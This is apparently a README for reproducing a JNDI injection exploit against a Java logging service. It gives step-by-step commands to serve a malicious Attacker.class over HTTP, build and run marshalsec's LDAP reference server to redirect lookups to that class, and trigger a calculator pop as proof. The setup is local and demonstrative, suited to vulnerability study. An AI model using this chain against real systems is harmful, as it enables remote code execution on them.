The remote/Attacker.class is already compiled with Java 1.8.0_292. You can use javac Attacker.java to compile it if you're using another version.
A total of 3 processes are required to reproduce it. If successfully triggered, the console will print Constructor and the calculator will be opened automatically.
Use python to host the Attacker.class file:
cd remote
python -m http.server 8888
Use the marshalsec tool to forward JNDI requests to the attacker's service:
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Attacker"
Use the command line or IDE to run src/main/java/LogService.java